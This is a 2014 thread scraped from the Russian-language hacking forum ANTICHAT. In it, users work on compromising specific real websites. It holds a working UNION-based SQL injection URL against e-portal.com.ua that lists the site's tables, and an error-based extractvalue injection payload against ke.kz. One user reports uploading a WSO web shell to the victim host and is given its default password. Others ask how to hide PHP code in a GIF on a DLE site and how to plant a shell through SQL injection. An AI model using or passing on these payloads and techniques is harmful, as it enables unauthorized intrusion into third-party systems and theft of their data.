ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.02.2014, 17:33
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Shade
Shade said:
Код:
Code:
http://www.e-portal.com.ua/news.php?id=-11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+--+
вот впринцепи и сама скуля... только если можно по подробней опишите ваши действия)) буду благодарен Если ты про http://e-portal.com.ua/admin , то там бэйсик авторизация. Данные от неё не хранятся на сервере.
|
|
|
09.02.2014, 17:41
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
а подробнее расскажи где они хранятся
Ну я имел ввиду в PMA.
|
|
|
|
09.02.2014, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
12774
Репутация:
12
|
|
Сообщение от kingbeef
kingbeef said:
Если ты про http://e-portal.com.ua/admin , то там бэйсик авторизация. Данные от неё не хранятся на сервере.
даа..ну я это и имел ввиду.. поэтому и спрашивал) спасибо
|
|
|
|
09.02.2014, 17:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от OxoTnik
OxoTnik said:
а подробнее расскажи где они хранятся
Если уж цепляться к словам, то при некотором желании это вполне можно организовать и не хранить от нее данные как минимум на том же сервере.
По скуле: file-прав нет, пичалька. Зато рядом валяются еще какие-то базы, в т.ч. от форума. Там вполне могут быть доступы в админку. Успехов.
|
|
|
|
10.02.2014, 19:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
12774
Репутация:
12
|
|
залил шелл WSO2 на хост через фтп.. захожу по ссылке а там шелл просит пароль.. кто знает какой пароль? вообще так должно быть? о_О
|
|
|
|
10.02.2014, 19:44
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Shade
Shade said:
залил шелл WSO2 на хост через фтп.. захожу по ссылке а там шелл просит пароль.. кто знает какой пароль? вообще так должно быть? о_О
Ну как бы в WSO стоит авторизация.
По умолчанию пароль "root" .
|
|
|
|
10.02.2014, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
7664
Репутация:
0
|
|
Сабж. Я сейчас устроился на работу помощник сис администратора. Сегодня на почту пришло сообщение со скриншотом
Сообщение от None
Ваш сайт уязвим, имеется SQL инъкция.
Код:
Code:
http://www.ke.kz/ru/Vzaimodejstvie/Media-centr/Events/arch=1/new_y=2014/new_m=2'
Хотел узнать, это действительно СКУЛЬ инъекция? |
|
|
|
11.02.2014, 00:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Yahoooo
Yahoooo said:
Сабж. Я сейчас устроился на работу помощник сис администратора. Сегодня на почту пришло сообщение со скриншотом
Код:
Code:
http://www.ke.kz/ru/Vzaimodejstvie/Media-centr/Events/arch=1/new_y=2014/new_m=2'
Хотел узнать, это действительно СКУЛЬ инъекция? Всё и проще и сложнее. Под катом практически весь url енкодинг, но вытащить ещё можно что-либо)
Код:
Code:
http://www.ke.kz/ru'and(extractvalue(1,concat(1,user())))or'
|
|
|
|
11.02.2014, 02:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
42267
Репутация:
5
|
|
Как залить на dle gif картинку с php кодом?
|
|
|
|
12.02.2014, 00:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
12774
Репутация:
12
|
|
Слышал что можно залить шелл на прямую (без доступа в админку) , если есть скуля... Кто что скажет по этому поводу ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
